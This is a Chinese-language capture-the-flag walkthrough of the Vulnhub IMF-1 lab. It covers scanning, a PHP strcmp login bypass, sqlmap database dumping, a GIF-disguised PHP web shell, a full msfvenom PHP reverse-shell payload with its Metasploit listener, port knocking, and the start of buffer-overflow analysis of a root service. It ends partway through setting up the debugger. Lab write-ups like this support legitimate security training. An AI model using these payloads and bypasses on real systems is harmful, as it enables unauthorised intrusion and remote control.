Vulnhub-IMF-1靶场渗透
主机发现
因为是在同一子网下,使用 arp-scan 直接扫描即可
┌──(root㉿kali)-[/home/kali]
└─# arp-scan 192.168.120.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.120.1 00:50:56:c0:00:08 (Unknown)
192.168.120.2 00:50:56:f6:91:bf (Unknown)
192.168.120.172 00:0c:29:3d:3b:81 (Unknown)
192.168.120.254 00:50:56:e0:b3:8e (Unknown)
9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.084 seconds (122.84 hosts/sec). 4 responded
可以得知目标主机ip为:192.168.120.172
信息搜集
端口扫描
开放端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.172 --min-rate=1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-08 23:47 EDT
Nmap scan report for 192.168.120.172
Host is up (0.0013s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:3D:3B:81 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 110.78 seconds
服务扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -p80 192.168.120.172
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-08 23:51 EDT
Nmap scan report for 192.168.120.172
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: IMF - Homepage
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:3D:3B:81 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.13 - 4.4 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.14 (93%), Linux 3.8 - 3.16 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (87%), Linux 3.13 - 3.16 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.13 ms 192.168.120.172
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.94 seconds
开放80/网站服务
目录扫描
使用gobuster进行目录扫描
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.120.172 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,t
xt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.172
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: aspx,jsp,bak,swp,config,php,txt,env,json,log,git,html,js,asp
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/contact.php (Status: 200) [Size: 8649]
/.html (Status: 403) [Size: 280]
/projects.php (Status: 200) [Size: 6574]
/index.php (Status: 200) [Size: 4797]
/.php (Status: 403) [Size: 280]
/images (Status: 301) [Size: 319] [--> http://192.168.120.172/images/]
/css (Status: 301) [Size: 316] [--> http://192.168.120.172/css/]
/js (Status: 301) [Size: 315] [--> http://192.168.120.172/js/]
/fonts (Status: 301) [Size: 318] [--> http://192.168.120.172/fonts/]
/less (Status: 301) [Size: 317] [--> http://192.168.120.172/less/]
/.html (Status: 403) [Size: 280]
/.php (Status: 403) [Size: 280]
/server-status (Status: 403) [Size: 280]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
- /contact.php
在其中得到三个内部人员的相关信息
flag1
在源码中发现了flag1,其他几个页面没有扫描有效信息:
其内容看得出来是base64编码的字符,解码后得到 allthefiles:
所有文件?在源码上方,还有几个文件,文件名疑似base64编码:
flag2
根据提示allthefiles,那么将文件名按顺序组合后解码,得到flag2:
其内容又是base64编码的,解码后得到提示:
- /imfadministrator/
在其源码中提到sql无法使用,但硬编码了密码:
随便输入内容后,发现提示用户名错误:
尝试使用前面 /contact.php 页面的相关信息后,发现使用邮箱前部分的用户名只显示密码错误:
尝试sqlmap后失败:
根据前面源码的提示,密码被硬编码,这通常使用==和strcmp在php中进行比较区分不同大小写字符串,但是strcmp有个特点,就是当字符串和数组进行比较时,函数返回0,修改源码绕过,使输入的值变为数组:
<input type="password" name="pass" value="">
// 改为:
<input type="password" name="pass[]" value="">
PS:strcmp()
用法:strcmp(string1, string2) 若返回0,代表两个字符串相等;若返回<0,代表string1小于 string2;若返回>0,代表string1大于 string2。
漏洞:对于传入非字符串类型的数据的时候,strcmp函数会报错,将return0,但却判定其相等了。所以,slrgmp()在比较字符串和数组的时候直接返回0,这样通过把目标变量设置成数组就可以绕过该函数的限制。
flag3
得到flag3和一个链接:
同样是base64编码,解码:
sql注入
进入链接后得到几个页面,url疑似存在sql注入和目录穿越,但经过尝试目录穿越不可行:
尝试sql注入,抓包后,使用数据包进行注入:
sqlmap -o -r req.txt --risk=3 --level=5 --dbs --batch --threads=10
--risk=3:指风险等级为3,增加OR语句的SQL注入测试
--level=5:表示当前扫描的等级,会测试HTTP Cookie头的值和User-Agent及HTTP Reference头的值
--dbs:列出所有的数据库
--batch:自动按照默认值运行下去,用户无需输入
--threads=10:指定线程为10
列出所有数据库
sqlmap -o -r req.txt --risk=3 --level=5 --batch --threads=10 -D admin --tables
进一步拿取数据,查看admin数据库内容
列出所有表
sqlmap -o -r req.txt --risk=3 --level=5 --batch --threads=10 -D admin --tables
列出所有列
sqlmap -o -r req.txt --risk=3 --level=5 --batch --threads=10 -D admin -T pages --columns
列出所有字段内容
sqlmap -o -r req.txt --risk=3 --level=5 --batch --threads=10 -D admin -T pages -C id,pagedata,pagename --dump
flag4
发现得到的三个pagename中,有一个之前没有发现,尝试访问:
存在一个二维码,扫描后得到flag4:
文件上传-权限获取&flag5
/uploadr942.php
内容依然是base64编码的字符,解码后又得到一个文件名,疑似一个路径:
尝试访问该路径,发现是一个文件上传页面,前端也没有什么过滤,可能后端存在过滤:
尝试文件上传,发现txt,php等不允许上传:
jpg等图片文件可以上传,但有大小限制,而且存在文件头验证:
且有waf检测内容,不允许存在恶意函数:
构造没有危险函数的语句的文件:
# 创建一个文件头为 FFD8DDE0 的jpeg文件
┌──(root㉿kali)-[/home/kali/Templates]
└─# echo 'FFD8FFE0' | xxd -r -p > shell.gif
┌──(root㉿kali)-[/home/kali/Templates]
└─# file shell.gif
shell.gif: JPEG image data
# 末尾写入注入语句
<?php $cmd=$_POST['cmd']; echo `$cmd`; ?>
PS:
- 在 PHP 中,反引号(
...) 会执行其中的内容作为 系统命令,并返回命令的输出结果(类似shell_exec()函数)。- 例如:
echowhoami`` 会执行whoami命令并输出当前系统用户。
上传成功:
使用gobuster扫描 /imfadministrator/ 目录,分析文件上传路径:
┌──(root㉿kali)-[/home/kali/Templates]
└─# gobuster dir -u http://192.168.120.172/imfadministrator/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x jpg -t 100 -
b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.172/imfadministrator/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: jpg
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 336] [--> http://192.168.120.172/imfadministrator/images/]
/uploads (Status: 301) [Size: 337] [--> http://192.168.120.172/imfadministrator/uploads/]
发现了一个uploads路径,但无法直接访问,而且也无法直接使用上传的文件名进行访问,查看源码,发现其中的注释写了一个字符串, 而且每次上传文件后该字符串都不一样,猜测可能是上传后的新名称,尝试访问:
成功访问,说明应该是有这么一个文件,成功执行命令,看到当前目录下的文件,其中有一个flag5文件:
其内容依然是base64编码,解码后为:
这个提示暂时没有办法利用
权限提升
为了方便执行命令,这里shell转为msf的shell:
创建payload:
┌──(root㉿kali)-[/home/kali/Templates]
└─# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.120.160 LPORT=4444 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1116 bytes
┌──(root㉿kali)-[/home/kali/Templates]
└─# cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.120.160'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
# MSF 监听器配置
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.120.160
set LPORT 4444
run
将内容进行base64编码后传入目标并解码:
拿到msf shell并生成一个更强大的交互式shell:
meterpreter > shell
Process 7474 created.
Channel 1 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@imf:/var/www/html/imfadministrator/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
PS:漏洞说明
这里之所以能以php解析gif,是因为目标站点的apache的文件解析漏洞,从目标站点的 .htaccess 文件内容可以看到,可以将gif文件解析为php:
www-data@imf:/var/www/html/imfadministrator/uploads$ cat .ht* cat .ht* AddType application/x-httpd-php .php .gif AddHandler application/x-httpd-php .gif
agent services
根据前面flag5的提示,下一个目标是agent服务相关的内容,查找agent相关的文件/内容
www-data@imf:/tmp$ find / -iname agent 2>/dev/null
find / -iname agent 2>/dev/null
/usr/local/bin/agent
/etc/xinetd.d/agent
找到两个agent文件,分别查看是什么东西:
-
/usr/local/bin/agent
www-data@imf:/tmp$ ls -al /usr/local/bin/agent ls -al /usr/local/bin/agent -rwxr-xr-x 1 root root 11896 Oct 12 2016 /usr/local/bin/agent www-data@imf:/tmp$ file /usr/local/bin/agent file /usr/local/bin/agent /usr/local/bin/agent: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=444d1910b8b99d492e6e79fe2383fd346fc8d4c7, not stripped可以看到是一个 ELF 可执行文件
-
/etc/xinetd.d/agent
www-data@imf:/tmp$ ls -al /etc/xinetd.d/agent ls -al /etc/xinetd.d/agent -rw-r--r-- 1 root root 379 Oct 11 2016 /etc/xinetd.d/agent www-data@imf:/tmp$ file /etc/xinetd.d/agent file /etc/xinetd.d/agent /etc/xinetd.d/agent: ASCII text www-data@imf:/tmp$ cat /etc/xinetd.d/agent cat /etc/xinetd.d/agent # default: on # description: The agent server serves agent sessions # unencrypted agentid for authentication. service agent { flags = REUSE socket_type = stream wait = no user = root server = /usr/local/bin/agent log_on_failure += USERID disable = no port = 7788 }这是一个文本文件,看起来是一个配置文件,其中说以root权限开起了一个agent服务(这里就是调用的之前那个agent执行文件),端口是7788
查看现有开放端口及其服务:
www-data@imf:/tmp$ netstat -atnup
netstat -atnup
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:7788 0.0.0.0:* LISTEN -
tcp 0 160 192.168.120.172:55198 192.168.120.160:4444 ESTABLISHED 7348/sh
tcp 0 0 192.168.120.172:55190 192.168.120.160:4444 ESTABLISHED 4620/sh
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 192.168.120.172:80 192.168.120.1:51604 ESTABLISHED -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
可以看到开放了7788,但之前的nmap端口扫描的时候没有发现,应该是防火墙做了设置。
查看agent执行文件所在目录下是否有其他信息:
www-data@imf:/tmp$ ls -alh /usr/local/bin/
ls -alh /usr/local/bin/
total 24K
drwxr-xr-x 2 root root 4.0K Oct 16 2016 .
drwxr-xr-x 10 root root 4.0K Sep 22 2016 ..
-rw-r--r-- 1 root root 19 Oct 16 2016 access_codes
-rwxr-xr-x 1 root root 12K Oct 12 2016 agent
www-data@imf:/tmp$ cat /usr/local/bin/access_codes
cat /usr/local/bin/access_codes
SYN 7482,8279,9467
可以看到还有一个文件,其中的内容可能关于端口碰撞的东西,端口碰撞见:项目6
端口碰撞
使用nmap进行端口碰撞:
┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -r 192.168.120.172 -p 7482,8279,9467
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 22:19 EDT
Nmap scan report for 192.168.120.172
Host is up (0.00045s latency).
PORT STATE SERVICE
7482/tcp filtered unknown
8279/tcp filtered unknown
9467/tcp filtered unknown
MAC Address: 00:0C:29:3D:3B:81 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.172 --min-rate=1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 22:19 EDT
Nmap scan report for 192.168.120.172
Host is up (0.00025s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
7788/tcp open unknown
MAC Address: 00:0C:29:3D:3B:81 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 101.44 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -sV -p7788 192.168.120.172
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 22:22 EDT
Nmap scan report for 192.168.120.172
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
7788/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port7788-TCP:V=7.95%I=7%D=4/10%Time=67F87D06%P=x86_64-pc-linux-gnu%r(NU
SF:LL,6F,"\x20\x20___\x20__\x20\x20__\x20___\x20\n\x20\|_\x20_\|\x20\x20\\
...
SF:|\x20\|\|\x20\|\\/\|\x20\|\x20_\|\x20\x20\x20Reporting\n\x20\|___\|_\|\
SF:x20\x20\|_\|_\|\x20\x20\x20\x20System\n\n\nAgent\x20ID\x20:\x20Invalid\
SF:x20Agent\x20ID\x20\n");
MAC Address: 00:0C:29:3D:3B:81 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.90 seconds
可以看到现在开启了7788端口和agent服务了
尝试访问开放的agent服务:
缓冲区溢出
缓冲区溢出原理:
通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它
指令,以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。进行缓冲区溢出攻击时需要找到目标的几个信息:
- 目标程序的缓冲区极限点在哪,即,偏移量
- 剩余的空间有多大,即,溢出后可操作的空间有多大
- 如何执行溢出的恶意代码
存在缓冲区溢出漏洞的函数:strcat()、sprintf()、vsprintf()、gets()、scanf()
本地分析
将目标程序agent拿到本地分析:
www-data@imf:/tmp$ base64 /usr/local/bin/agent
base64 /usr/local/bin/agent
f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAAIUECDQAAACgKQAAAAAAADQAIAAJACgAHwAcAAYAAAA0
AAAANIAECDSABAggAQAAIAEAAAUAAAAEAAAAAwAAAFQBAABUgQQIVIEECBMAAAATAAAABAAAAAEA
AAABAAAAAAAAAACABAgAgAQIKA8AACgPAAAFAAAAABAAAAEAAAAIHwAACK8ECAivBAg0AQAARAEA.....
┌──(root㉿kali)-[/home/kali/Templates]
└─# vim base64.txt
┌──(root㉿kali)-[/home/kali/Templates]
└─# cat base64.txt | base64 -d > agent
┌──(root㉿kali)-[/home/kali/Templates]
└─# ls -alh
总计 48K
drwxr-xr-x 2 kali kali 4.0K 4月10日 22:57 .
drwx------ 19 kali kali 4.0K 4月10日 22:17 ..
-rw-r--r-- 1 root root 12K 4月10日 22:57 agent
-rw-r--r-- 1 root root 16K 4月10日 22:57 base64.txt
使用进程跟踪分析工具 ltrace 进行调试分析:
┌──(root㉿kali)-[/home/kali/Templates]
└─# ltrace ./agent
__libc_start_main(["./agent"] <unfinished ...>
setbuf(0xf7f62d40, nil) = <void>
asprintf("48093572", "%i", 48093572) = 8
puts(" ___ __ __ ___ " ___ __ __ ___
) = 18
puts(" |_ _| \\/ | __| Agent" |_ _| \/ | __| Agent
) = 25
puts(" | || |\\/| | _| Reporting" | || |\/| | _| Reporting
) = 29
puts(" |___|_| |_|_| System\n" |___|_| |_|_| System
) = 27
printf("\nAgent ID : "
Agent ID : ) = 12
fgets(jdoaidoa
"jdoaidoa", 9, 0xf7f625c0) = 0xff946d2e
strncmp("jdoaidoa", "48093572", 8) = 1
puts("Invalid Agent ID "Invalid Agent ID
) = 18
+++ exited (status 254) +++
可以看到当输入 fgets( 接收了任意输入(jdoaidoa)之后,使用了 strncmp() 函数进行判断两个字符,一个是内置的硬编码字符串,比较结果是1,说明不相等,这个函数和前面web界面的php函数 strcmp() 是一样的功能,这里暴露了其中的比较值,那么尝试使用该值(48093572)进行尝试登入:
┌──(root㉿kali)-[/home/kali/Templates]
└─# ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection:
可以看到成功进入了
溢出验证
使用 strings 查看程序中的函数,查看使用的函数:
┌──(root㉿kali)-[/home/kali/Templates]
└─# strings ./agent
...
Ashton Park, Mosman, Sydney, New South Wales, Australia
Argyle Place, The Rocks, Sydney, New South Wales, Australia
Extraction Request
Enter extraction location:
Location: %s
Extraction team has been deployed.
Enter report update:
Report: %s
Submitted for review.
;*2$",
...
其中有两个%s这里就可能存在缓冲区溢出的点,这里的report一个是menu里面的3,尝试输入超长字符串看看是否会报错,如果报错,那就说明存在溢出,那就需要进一步分析找到偏移量:
正常输入:
┌──(root㉿kali)-[/home/kali/Templates]
└─# ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3
Enter report update: q
Report: q
Submitted for review.
超长输入:
# 生成超长字符
┌──(root㉿kali)-[/home/kali/Templates]
└─# python3
Python 3.13.2 (main, Mar 13 2025, 14:29:07) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> print('A'*200)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# 开始测试
┌──(root㉿kali)-[/home/kali/Templates]
└─# ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System
Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3
Enter report update: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Report: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Submitted for review.
zsh: segmentation fault ./agent
可以看到输入超长字符串之后报错了:segmentation fault ./agent,说明存在溢出,那么就要找到偏移量
查找偏移量
安装/配置工具:
cd ~ git clone https://github.com/scwuaptx/Pwngdb.git git clone https://github.com/longld/peda.git git clone https://github.com/pwndbg/pwndbg cd ./pwndbg ./setup.sh cd .. cp ./Pwngdb/.gdbinit ~/ vim ~/.gdbinit # 配置如下: source ~/peda/peda.py source ~/pwndgb/gdbinit.py source ~/Pwngdb/pwngdb.py source ~/Pwngdb/angelheap/gdbinit.py define hook-run python import angelheap angelheap.init_angelheap() end end
浙公网安备 33010602011771号